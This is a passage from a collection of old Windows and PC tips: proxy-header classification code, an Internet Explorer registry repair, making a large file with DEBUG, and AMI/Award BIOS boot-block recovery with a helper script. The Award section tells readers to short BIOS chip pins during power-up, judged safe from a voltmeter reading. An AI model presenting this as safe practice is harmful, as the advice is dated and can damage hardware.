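               "HTTP_X_FORWARDED_FOR": "194.85.1.1"}
NO_HEADERS = {"REMOTE_ADDR": "194.115.5.5"}
PRIVATE_XFF = {"REMOTE_ADDR": "194.85.1.1", "HTTP_VIA": "1.1 proxy",
               "HTTP_X_FORWARDED_FOR": "10.0.0.7, 194.85.1.1"}

if __name__ == "__main__":
    for env in (PAGE_EXAMPLE, SIMPLE_ANON, NO_HEADERS, PRIVATE_XFF):
        print(classify_request(env), "->", effective_client_ip(env, {"194.85.1.1"}))
```

The classification is only ever a hint: a request with no proxy headers may come straight from the client or through a high-anonymity proxy, and the values of HTTP_VIA and HTTP_X_FORWARDED_FOR are whatever the upstream chose to send. That is why the access-control and logging path should go through `effective_client_ip` with an explicit list of your own proxies rather than trusting the forwarded address.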

Broken IE, How to fix it?



So one of your friends, “not you of course”, has managed to nuke Internet Explorer and they are unsure how they did it. You’ve eliminated the possibility of viruses and adware, so this just leaves you and a broken IE. Before you begin to even consider running a repair install of the OS, let’s try to do a repair on IE instead.

THE REPAIR PROCESS

Start the Registry Editor by typing regedit in the Run box. Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}, right-click the IsInstalled value and click Modify. Change the value from 1 to 0. All right, go ahead and close the editor and reinstall IE from this location: http://www.microsoft.com/windows/ie/default.mspx

IF SOMETHING GOES WRONG

If you are messing with the registry and something goes horribly wrong, you can use "Last Known Good Configuration" (F8 Safe Mode) or a Restore Point to get back to where you were before, with your settings. Then you can try again, this time taking care to watch the portion of the registry you are changing. Most people who have troubles with this end up changing the wrong registry key.

Hope this tutorial helps.

Create A Huge File


You can create a file of any size using nothing more than what's supplied with Windows. Start by converting the desired file size into hexadecimal notation. You can use the Windows Calculator in Scientific mode to do this. Suppose you want a file of 1 million bytes. Enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240). Pad the result with zeros on the left until it is eight digits long: 000F4240.


Now open a command prompt window. In Windows 95, 98, or Me, you can do this by entering COMMAND in the Start menu's Run dialog; in Windows NT 4.0, 2000, or XP enter CMD instead. Enter the command DEBUG BIGFILE.DAT and ignore the File not found message. Type RCX and press Enter. Debug will display a colon prompt. Enter the last four digits of the hexadecimal number you calculated (4240, in our example). Type RBX and press Enter, then enter the first four digits of the hexadecimal size (000F, in our example). Enter W for Write and Q for Quit. You've just created a 1-million-byte file using Debug (BX holds the high half of the size and CX the low half). Of course you can create a file of any desired size using the same technique. Note that DEBUG is a 16-bit program and is not present in 64-bit editions of Windows.

Boot Block Recovery For Free


You don't need to pay a measly sum of dollars just to recover from boot block mode. Here it is, folks:


AWARD Bootblock recovery

That shorting trick should work if the boot block code is not corrupted, and it should not be if the /sb switch was used when flashing the BIOS (instead of the /wb switch).

The two pins to short to force a checksum error vary from chip to chip, but they are usually the highest-numbered address pins (A10 and above).

These are the pins used by the system to read the System BIOS (original.bin for award v6), calculate the ROM checksum and see if it’s valid before decompressing it into memory, and subsequently allow Bootblock POST to pass control over to the System BIOS.

You just have to fool the system into believing that the System BIOS is corrupt. This you do by giving your system a hard time reading the System BIOS by shorting the 2 high address pins. And when it could not read the System BIOS properly, ROM Checksum Error is detected “so to speak” and Bootblock recovery is activated.

Sometimes no combination of the high address pins will force a checksum error in some chips, like my Winbond W49F002U. But shorting the #WE pin with the highest-numbered address pin (A17) worked for this chip. You just have to experiment if you’re not comfortable with “hot flashing” or a “replacement BIOS”.

But to avoid further damage to your chip if you’re not sure which are the correct pins to short, measure the potential between the 2 pins with a voltmeter while the system is on. If the voltage reading is zero (no potential at all), it is safe to short these pins.

But do not short the pins while the system is on. Instead, power down then do the short, then power up while still shorting. And as soon as you hear 3 beeps (1 long, 2 short), remove the short at once so that automatic reflashing from Drive A can proceed without errors (assuming you had autoexec.bat in it).

About how to do the shorting, the tip of a screwdriver would do. But with such minute pins on the PLCC chip, I’m pretty comfortable doing it with the tip of my multi-tester or voltmeter probe. Short the pins at the point where they come out of the chip.

AMIBIOS Recovery bootblock

1. Copy a known working BIOS image for your board to a floppy and rename it to AMIBOOT.ROM.
2. Insert the floppy in your system’s floppy drive.
3. Power on the system while holding the CTRL+Home keys. Release the keys when you hear a beep and/or see the floppy light coming on.
4. Just wait until you hear 4 beeps. When 4 beeps are heard, the reprogramming of the System Block BIOS was successful, and you may restart your system.

Some alternative keys that can be used to force BIOS update (only the System Block will be updated so it’s quite safe):
CTRL+Home= restore missing code into system block and clear CMOS when programming went ok.
CTRL+Page Up= restore missing code into system block and clear CMOS or DMI when programming went ok.
CTRL+Page Down= restore missing code into system block and do not clear CMOS and DMI area when programming went ok
Btw: the alternative keys work only with AMIBIOS 7 or higher (so, for example, an AMI 6.26 BIOS can only be recovered by using the CTRL+Home keys).

BLACKOUT Flashing

Recovering a Corrupt AMI BIOS chip
With motherboards that use a BOOT BLOCK BIOS it is possible to recover a corrupted BIOS, because the BOOT BLOCK section of the BIOS, which is responsible for booting the computer, remains unmodified. When an AMI BIOS becomes corrupt the system will appear to start, but nothing will appear on the screen; the floppy drive light will come on and the system will access the floppy drive repeatedly. If your motherboard has an ISA slot and you have an old ISA video card lying around, put the ISA video card in your system and connect the monitor. The BOOT BLOCK section of the BIOS only supports ISA video cards, so if you do not have an ISA video card or your motherboard does not have ISA slots, you will have to restore your BIOS blind, with no monitor to show you what’s going on.

AMI has integrated a recovery routine into the BOOT BLOCK of the BIOS which, in the event the BIOS becomes corrupt, can be used to restore the BIOS to a working state. The routine is called when the SYSTEM BLOCK of the BIOS is empty. The restore routine will access the floppy drive looking for a BIOS file named AMIBOOT.ROM; this is why the floppy drive light comes on and the drive spins. If the file is found it is loaded into the SYSTEM BLOCK of the BIOS to replace the missing information. To restore your BIOS, simply copy a working BIOS file to a floppy diskette and rename it AMIBOOT.ROM, then insert it into the computer while the power is on. The diskette does not need to be bootable or contain a flash utility. After about four minutes the system will beep four times. Remove the floppy diskette from the drive and reboot the computer. The BIOS should now be restored.

Recovering a Corrupt AWARD BIOS

With an AWARD BIOS the process is similar but still a bit different. To recover an AWARD BIOS you will need to create a floppy diskette with a working BIOS file in .BIN format, an AWARD flash utility and an AUTOEXEC.BAT file. An AWARD BIOS will not automatically restore the BIOS information to the SYSTEM BLOCK, so you will need to add the commands necessary to flash the BIOS to the AUTOEXEC.BAT file. The system will run the AUTOEXEC.BAT file, which will in turn flash the BIOS. This is fairly easy. Here are the steps you need to take.

· Create a bootable floppy diskette
· Copy the BIOS file and flash utility to the diskette
· Create a text file named AUTOEXEC.BAT with any standard text editor and add the following lines

@ECHO OFF
FLASH763 BIOSFILE.BIN /py

In the above example I am assuming that you are using the FLASH763.EXE flash utility. You will need to replace FLASH763 with the name of whatever flash utility you are using, and replace BIOSFILE.BIN with the name of the BIOS file you are using. You will also need to change the ‘/py’ to whatever the command is for your flash utility to automatically program the BIOS without user intervention. If you do not know the command to automatically flash your BIOS, type the name of the flash utility followed by a space and /? to display the utility’s help screen. The help screen should specify the command switch to automatically flash your BIOS. If you are using the FLASH763.EXE utility then the switch to automatically flash your BIOS is ‘/py’.
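The AMI and AWARD recovery diskettes described above differ only in what has to be on them, and a flash that goes wrong halfway is exactly what you are trying to recover from, so it pays to sanity-check the image before it is written. Here is an added Python helper (my own code, not from the text or from any BIOS vendor) that assembles the contents of either diskette in memory, applying the rules stated above: an AMI boot block wants only the image renamed AMIBOOT.ROM, while an AWARD boot block needs the image, the flash utility and an AUTOEXEC.BAT that calls the utility with its unattended switch. The size bounds and the optional SHA-256 comparison against a hash you obtained from the board vendor are my additions; the function names are assumptions.

```python
"""Assemble a BIOS recovery floppy's contents in memory (added example).

The vendor rules come from the text above; the plausibility checks on the
image are my own.  Writing the resulting files to the diskette is left to
write_set(), so the builder itself can be tested without touching a drive.
"""
import hashlib
import pathlib
from typing import Dict, Optional

# Flash ROMs of that era were 64 KiB to a few MiB and always a power of two;
# a truncated download or a web page saved as "BIOS.BIN" fails this at once.
MIN_IMAGE = 64 * 1024
MAX_IMAGE = 16 * 1024 * 1024


def image_digest(image: bytes) -> str:
    """SHA-256 of the image, for comparison with the vendor's published hash."""
    return hashlib.sha256(image).hexdigest()


def check_image(image: bytes, expected_sha256: Optional[str] = None) -> None:
    """Raise ValueError if the image is the wrong shape or the wrong file."""
    size = len(image)
    if size < MIN_IMAGE or size > MAX_IMAGE or size & (size - 1):
        raise ValueError(f"implausible BIOS image size: {size} bytes")
    if expected_sha256 is not None:
        if image_digest(image).lower() != expected_sha256.lower():
            raise ValueError("image does not match the expected SHA-256")


def image_is_plausible(image: bytes, expected_sha256: Optional[str] = None) -> bool:
    """Boolean form of check_image() for callers that prefer a yes/no answer."""
    try:
        check_image(image, expected_sha256)
    except ValueError:
        return False
    return True


def autoexec_bat(flash_util: str, bios_file: str, switch: str) -> bytes:
    """The two-line batch file from the text, with DOS line endings."""
    return f"@ECHO OFF\r\n{flash_util} {bios_file} {switch}\r\n".encode("ascii")


def build_recovery_set(image: bytes, vendor: str,
                       flash_util: Optional[str] = None,
                       flash_util_bytes: Optional[bytes] = None,
                       switch: Optional[str] = None,
                       bios_file: str = "BIOSFILE.BIN",
                       expected_sha256: Optional[str] = None) -> Dict[str, bytes]:
    """Return {filename: contents} for the diskette, per vendor rules."""
    check_image(image, expected_sha256)
    vendor = vendor.lower()
    if vendor == "ami":
        # The boot block looks for this exact name; no utility is needed.
        return {"AMIBOOT.ROM": image}
    if vendor == "award":
        if not (flash_util and flash_util_bytes and switch):
            raise ValueError("Award recovery needs the flash utility, its bytes "
                             "and its unattended switch (e.g. /py)")
        return {
            bios_file: image,
            f"{flash_util.upper()}.EXE": flash_util_bytes,
            "AUTOEXEC.BAT": autoexec_bat(flash_util, bios_file, switch),
        }
    raise ValueError(f"unknown BIOS vendor: {vendor}")


def write_set(files: Dict[str, bytes], dest_dir: str) -> None:
    """Write the assembled files to a (mounted) floppy or staging directory."""
    out = pathlib.Path(dest_dir)
    out.mkdir(parents=True, exist_ok=True)
    for name, data in files.items():
        (out / name).write_bytes(data)
```

Call `build_recovery_set(image, "ami", expected_sha256=...)` or `build_recovery_set(image, "award", flash_util="FLASH763", flash_util_bytes=util, switch="/py")` and hand the result to `write_set()` with the floppy's mount point. The SHA-256 check is optional but is the cheap way to be sure the "known working BIOS image" really is the one the vendor published and not a modified or truncated copy.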